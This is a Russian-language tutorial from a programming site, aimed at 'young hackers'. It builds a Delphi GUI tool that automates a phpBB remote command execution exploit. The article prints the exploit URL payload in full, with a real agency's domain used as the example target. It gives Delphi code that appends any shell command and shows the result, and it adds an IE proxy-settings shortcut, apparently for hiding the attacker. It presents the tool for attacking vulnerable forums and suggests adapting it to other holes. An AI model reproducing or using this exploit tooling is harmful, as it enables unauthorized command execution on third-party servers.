Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Пример работы с... 65535
Содержание сайт... 65535
ТЕХНОЛОГИИ ДОСТ... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Создание отчето... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Модуль Forms 65535
21 ошибка прогр... 64737
Реклама
Сейчас на сайте
Гостей: 8
На сайте нет зарегистрированных пользователей

Пользователей: 13,136
новичок: Happy
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

Моделирование интернет кафе на GPSS + Отчет
Моделирование станции технического обслуживания на GPSS + Отчет
Программа тестирования (тест) - вступительные экзамены (математика, физи...

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
Написание детских эксплойтов
Здарова, юный кулхацкер, сегодня я расскажу тебе
как самому написать “десткий” эксплоит,

вернее это больше похоже на облегчение использования эксплойта, почему так, ты
поймёшь в процессе чтения. Я существо ленивое :) и именно лень толкнула меня
написать описываемый здесь пример. Просто меня задолбало каждый раз лазить в
текстовый файлик, копировать оттуда строку с эксплойтом и вставлять её в окошко
браузера.

Мы всё будем писать на Delphi т.к. он сейчас популярен среди начинающих хацкеров
и не только.

Итак, преступим!

Ты наверное слышал о огромной дыре в phpBB через которую можно было выпонять
команды на сервере. Вот сам эксплоит –



[site]/forum/viewtopic.php?t=7&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=команда



Скажи, тебе охота каждый раз, найдя бажный форум, лезть в текстовик, копировать
строку с эксплойтом и вставлять её в браузер? Мне тоже, поэтому я и написал
следующую вещь.

Весь код писался на Delphi 6 но мне кажется и в других версиях не будет проблем.


Главное чтоб в версии делфи которую ты юзаешь был компонент WebBrowser.
Остальные компоненты вроде бы имеются во всех версиях.

Зайди в делфи и создай новый проект. На форме размести следующие компоненты:

1.WebBrowser (1 штука)

2.Edit (3 штуки)

3.Lable (3 штуки)

4.Button (1 штука)

Затем назови поля Edit следующими именами – AdresEdit, CmdEdit и TopicEdit

В свойстве Caption, компонентов lable, впиши следующее – Номер топика, Адресс
сайта, Команда.

И Caption кнопки измени на go!

Итак сам кодинг!

Размести компоненты на форме так чтобы тебе было удобно потом пользоватся.

Теперь два раза щёлкни на кнопку go! , создастся обработчик события OnClick.

Затем между begin и end введи

 




WebBrowser1.Navigate(AdresEdit.text+'viewtopic.php?t=
'+TopicEdit+'&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd='+CmdEdit.text);





Этот код пиши одной строкой.

Сейчас всё обьясню. Оператор WebBrowser1.Navigate отвечает за адресную строку, у
нас идёт следующее обращение – сначала берётся строка из поля AdressEdit
(например: www.nasa.gov/forum/) затем к ней прибовляется строка
“viewtopic.php?t=” таким образом у нас уже получается строка www.nasa.gov/forum/viewtopic.php?t=
, затем берётся число из поля TopicEdit (если на атакуемом форуме несуществует
топика с указанным тобою номером то эксплоит несработает а выдаст сообщение о не
существовании темы),допустим ты ввёл 59, тогда получается строка www.nasa.gov/forum/viewtopic.php?t=59

Затем ко всему этому пребовляется строка

“&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=” и получается у нас

www.nasa.gov/forum/viewtopic.php?t=59&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=


Теперь после знака “=” прибавляется то что ты набрал в строке CmdEdit (к примеру
ls).

Вот и получается строка обращения компонента WebBrowser

 


www.nasa.gov/forum/viewtopic.php?
t=59&highlight=%2527.\$poster=%60\$cmd%60.%527&cmd=ls





Результат этого запроса тут-же отобразится в компоненте WebBrowser.

Теперь тебе не придётся лазить за эксплоитом в текстовик а достаточно просто
запустить скомпилёный экзешник и набрать там адрес, номер топика и желаемую
тобой команду.

Обрати внимание что адресс должен содержать и путь к папке с форумом, например
www.nasa.gov/phpBB2/ или www.site.com/forum/

Кстати, при использовании компонента WebBrowser появляется одна интересная
возможность, дело в том что этот компонент непосредственно связан с IE и берёт
все настройки из него, в том числе и настройки проксика :). Ты думаешь что тебе
каждый раз придётся лазить в IE и менять настройки? Ты ошибаешся, можно это
оформить и в самой нашей проге.

В Delphi есть полезная функция ShellExecute она отвечает за запуск *.cpl файлов.
В cpl файлах хранятся настройки винды, например настройки рабочего стола. Но нам
нужны настройки IE. Это тоже можно реализовать. На форме своей проги размести
ещё одну кнопку и назови её “Настройки” или чтонить типа этого. Два раза кликни
на эту кнопку и между begin и end впиши следующее:

 


ShellExecute(Application.Handle, Pchar('Open'),

Pchar('Rundll32.exe'), Pchar('shell32, Control_RunDLL inetcpl.cpl'),

'', SW_SHOWNORMAL);





inetcpl.cpl – это имя cpl файла, в котором хранятся настройки, в разных виндах
файл может называться по разному, так что если не получится то попробуй в поиске
набрать *.cpl и среди найденных файлов найдите похожие по смыслу, подставляй их
имена заместо inetcpl.cpl и пробуй :), Теперь прямо из своей проги ты можешь
настроить проксик и прочее.

Надеюсь тебе не составит труда перебить эксплоит под какую нибудб другую
уязвимость :)



Предупреждаю что применение данного сплойта могут повлечь за собой уголовную
ответственность, за вред причиненный вышеописаной программой автор
ответственности не несет!!!
Опубликовал Kest Октябрь 25 2008 15:32:56 · 0 Комментариев · 14488 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
Программирование ...
Синтаксический ан...
Шкрыль А. - Разра...
Язык программиров...
Платформа програм...
SearchAndReplace
PHP 5. Полное рук...
Медиа комбайн
Длинный заголовок...
AboutSystem
AlnComponents
THttpScan v4.1
KOL & MCK v1.69
Illusion
Библия хакера 2 К...
index.php + мод ...
Приложение Клиент...
Trojan [Исходник ...
Шаблон для новост...
PHP 5 на примерах

Топ загрузок
Приложение Клие... 100617
Delphi 7 Enterp... 94277
Converter AMR<-... 20147
GPSS World Stud... 16263
Borland C++Buil... 13569
Borland Delphi ... 9553
Turbo Pascal fo... 7174
Калькулятор [Ис... 5393
Visual Studio 2... 5074
FreeSMS v1.3.1 3589
Случайные статьи
Сплит-тестирование...
н - Алфавитный ука...
Реализация сеансов...
Чем заменить перек...
Считывание заданно...
Элементы управлени...
ОГП обладает приор...
Интерфейс семафоро...
Сортировка простым...
Чтобы защитить рек...
Рейтинг кредитный
Пример организации...
NUKE. Факты из ист...
(Request Security)...
своему RAD1 US-сер...
SPLIT (РАСЩЕПИТЬ)
Изготовление метал...
Распределенные фай...
Пион уклоняющийся ...
Доставка грузов
Замена мембран кнопок
Хранение документ...
Ламбда-подъем при ...
уровню защиты
Метод экспертного ...
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?